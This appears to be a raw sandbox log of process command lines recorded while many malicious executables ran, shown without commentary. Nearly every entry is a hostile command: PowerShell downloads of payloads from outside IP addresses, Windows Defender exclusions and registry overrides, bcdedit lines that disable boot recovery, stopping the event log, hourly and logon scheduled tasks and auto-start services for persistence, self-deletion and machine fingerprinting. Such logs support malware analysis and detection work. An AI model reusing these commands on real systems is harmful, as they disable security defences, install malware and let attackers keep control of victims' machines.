"C:\Users\Admin\Desktop\a\smartsoftsignew.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Users\Admin\Desktop\a\ADServices.exe

"C:\Users\Admin\Desktop\a\ADServices.exe"

C:\Users\Admin\Desktop\a\New.exe

"C:\Users\Admin\Desktop\a\New.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

"C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\New.exe" -Force

C:\Users\Admin\Desktop\a\GTA_V.exe

"C:\Users\Admin\Desktop\a\GTA_V.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Users\Admin\Desktop\a\CapSimple.exe

"C:\Users\Admin\Desktop\a\CapSimple.exe"

C:\Users\Admin\AppData\Local\Temp\is-UU6VF.tmp\GTA_V.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UU6VF.tmp\GTA_V.tmp" /SL5="$104D0,18247052,1148416,C:\Users\Admin\Desktop\a\GTA_V.exe"

C:\Users\Admin\Desktop\a\RambledMimets.exe

"C:\Users\Admin\Desktop\a\RambledMimets.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\Desktop\a\ld.exe

"C:\Users\Admin\Desktop\a\ld.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Desktop\a\MSiedge.exe

"C:\Users\Admin\Desktop\a\MSiedge.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\is-2H7LT.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-2H7LT.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-2H7LT.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-2H7LT.tmp

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled no

C:\Users\Admin\Desktop\a\victor.exe

"C:\Users\Admin\Desktop\a\victor.exe"

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 180

C:\Users\Admin\Desktop\a\RambledMime.exe

"C:\Users\Admin\Desktop\a\RambledMime.exe"

C:\Users\Admin\Desktop\a\current.exe

"C:\Users\Admin\Desktop\a\current.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rnlqjc.bat" "

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\host_so.exe

"C:\Users\Admin\Desktop\a\host_so.exe"

C:\Users\Admin\Desktop\a\mixinte.exe

"C:\Users\Admin\Desktop\a\mixinte.exe"

C:\Users\Admin\Desktop\a\inte.exe

"C:\Users\Admin\Desktop\a\inte.exe"

C:\Users\Admin\AppData\Local\Temp\zcmgkq.exe

"C:\Users\Admin\AppData\Local\Temp\zcmgkq.exe"

C:\Users\Admin\Desktop\a\winlogon.exe

"C:\Users\Admin\Desktop\a\winlogon.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\Desktop\a\volumeinfo.exe

"C:\Users\Admin\Desktop\a\volumeinfo.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661\MSIUpdaterV2663.exe" /tn "MSIUpdaterV2663_0cc175b9c0f1b6a831c399e269772661 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"

C:\Users\Admin\AppData\Local\Temp\spanmNnF53lFrUdi\kv5qq2mgoKVUxTj6AYPM.exe

"C:\Users\Admin\AppData\Local\Temp\spanmNnF53lFrUdi\kv5qq2mgoKVUxTj6AYPM.exe"

C:\Users\Admin\AppData\Local\Temp\spanDE5SWYuo6N4k\kUyg10Gf2qyWPVqZXiv8.exe

"C:\Users\Admin\AppData\Local\Temp\spanDE5SWYuo6N4k\kUyg10Gf2qyWPVqZXiv8.exe"

C:\Users\Admin\AppData\Local\Temp\bbrkoj.exe

"C:\Users\Admin\AppData\Local\Temp\bbrkoj.exe"

C:\Users\Admin\Desktop\a\setup.exe

"C:\Users\Admin\Desktop\a\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\Desktop\a\file300un.exe

"C:\Users\Admin\Desktop\a\file300un.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\buildjudit.exe

"C:\Users\Admin\Desktop\a\buildjudit.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF981.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Desktop\a\lumma1234.exe

"C:\Users\Admin\Desktop\a\lumma1234.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4A60.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Users\Admin\Desktop\a\go.exe

"C:\Users\Admin\Desktop\a\go.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Desktop\a\random.exe

"C:\Users\Admin\Desktop\a\random.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_7016_133617369568940385\stub.exe

"C:\Users\Admin\Desktop\a\buildjudit.exe"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Users\Admin\Desktop\a\33333.exe

"C:\Users\Admin\Desktop\a\33333.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\lenin.exe

"C:\Users\Admin\Desktop\a\lenin.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\Desktop\a\inte.exe" & exit

C:\Users\Admin\Desktop\a\alex.exe

"C:\Users\Admin\Desktop\a\alex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Users\Admin\Desktop\a\well.exe

"C:\Users\Admin\Desktop\a\well.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.exe" /f & erase "C:\Users\Admin\Desktop\a\mixinte.exe" & exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\Desktop\a\swizzzz.exe

"C:\Users\Admin\Desktop\a\swizzzz.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\sarra.exe

"C:\Users\Admin\Desktop\a\sarra.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "inte.exe" /f

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\228.exe

"C:\Users\Admin\Desktop\a\228.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "BOPEWJMX"

C:\Users\Admin\Desktop\a\fileosn.exe

"C:\Users\Admin\Desktop\a\fileosn.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 172

C:\Users\Admin\Desktop\a\amers.exe

"C:\Users\Admin\Desktop\a\amers.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "mixinte.exe" /f

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "BOPEWJMX" binpath= "C:\ProgramData\blfxrrjqlejx\tjuwmtdruimz.exe" start= "auto"

C:\Users\Admin\Pictures\KDzj65oYZR0YCEtDNN23oMlZ.exe

"C:\Users\Admin\Pictures\KDzj65oYZR0YCEtDNN23oMlZ.exe"

C:\Users\Admin\Desktop\a\gold.exe

"C:\Users\Admin\Desktop\a\gold.exe"

C:\Users\Admin\Pictures\ioz49P0W2obNtNUt0sOjaFGY.exe

"C:\Users\Admin\Pictures\ioz49P0W2obNtNUt0sOjaFGY.exe"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "QDNDAVGE"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\Pictures\aBaqky64u8Edo0AtfSvMiopi.exe

"C:\Users\Admin\Pictures\aBaqky64u8Edo0AtfSvMiopi.exe"

C:\Users\Admin\Pictures\AcjH2LHz0NSfEpsAuYQUSMFq.exe

"C:\Users\Admin\Pictures\AcjH2LHz0NSfEpsAuYQUSMFq.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_dd08d9de148da241a92ce8f1f016862a LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Desktop\a\5.exe

"C:\Users\Admin\Desktop\a\5.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7766.tmp\Install.exe

.\Install.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "BOPEWJMX"

C:\Users\Admin\Desktop\a\Newoff.exe

"C:\Users\Admin\Desktop\a\Newoff.exe"

C:\Users\Admin\Pictures\eGj97GDZCKrB8XL55ATom370.exe

"C:\Users\Admin\Pictures\eGj97GDZCKrB8XL55ATom370.exe" /s

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "QDNDAVGE" binpath= "C:\ProgramData\eqcvxslgwglo\gyzndvtkicye.exe" start= "auto"

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\ProgramData\blfxrrjqlejx\tjuwmtdruimz.exe

C:\ProgramData\blfxrrjqlejx\tjuwmtdruimz.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "QDNDAVGE"

C:\Users\Admin\AppData\Local\Temp\7zSB625.tmp\Install.exe

.\Install.exe /yrVdidRYRgn "385118" /S

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\ProgramData\eqcvxslgwglo\gyzndvtkicye.exe

C:\ProgramData\eqcvxslgwglo\gyzndvtkicye.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\span34yvfx8Pq6hB\oUZaA1L8gFFzh3usDDu1.exe

"C:\Users\Admin\AppData\Local\Temp\span34yvfx8Pq6hB\oUZaA1L8gFFzh3usDDu1.exe"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_c743bb12f321204aca6c69356124da3d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_c743bb12f321204aca6c69356124da3d HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\Desktop\a\Newoff.exe" /F

C:\Users\Admin\AppData\Local\Temp\span6Mj_MHxFLqjA\6PGw751WCfayjenAGMr6.exe

"C:\Users\Admin\AppData\Local\Temp\span6Mj_MHxFLqjA\6PGw751WCfayjenAGMr6.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_c743bb12f321204aca6c69356124da3d\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_c743bb12f321204aca6c69356124da3d LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\span34yvfx8Pq6hB\cw1UXy1kKj7xhJOrLmhR.exe

"C:\Users\Admin\AppData\Local\Temp\span34yvfx8Pq6hB\cw1UXy1kKj7xhJOrLmhR.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\AcjH2LHz0NSfEpsAuYQUSMFq.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\5f3346c213964d358e3707c74935ece3 /t 3412 /p 11708

C:\Users\Admin\Documents\SimpleAdobe\2HOnZa9NkfeCzucqN0okRqFk.exe

C:\Users\Admin\Documents\SimpleAdobe\2HOnZa9NkfeCzucqN0okRqFk.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11920 -s 244

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_cdadee9df207f6abc90cbd5b39516bf4 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 17:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4A60.tmp\Install.exe\" PP /vSwdidWinr 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Local\Temp\span34yvfx8Pq6hB\ecK6oXV0XexLKwRllPwb.exe

"C:\Users\Admin\AppData\Local\Temp\span34yvfx8Pq6hB\ecK6oXV0XexLKwRllPwb.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

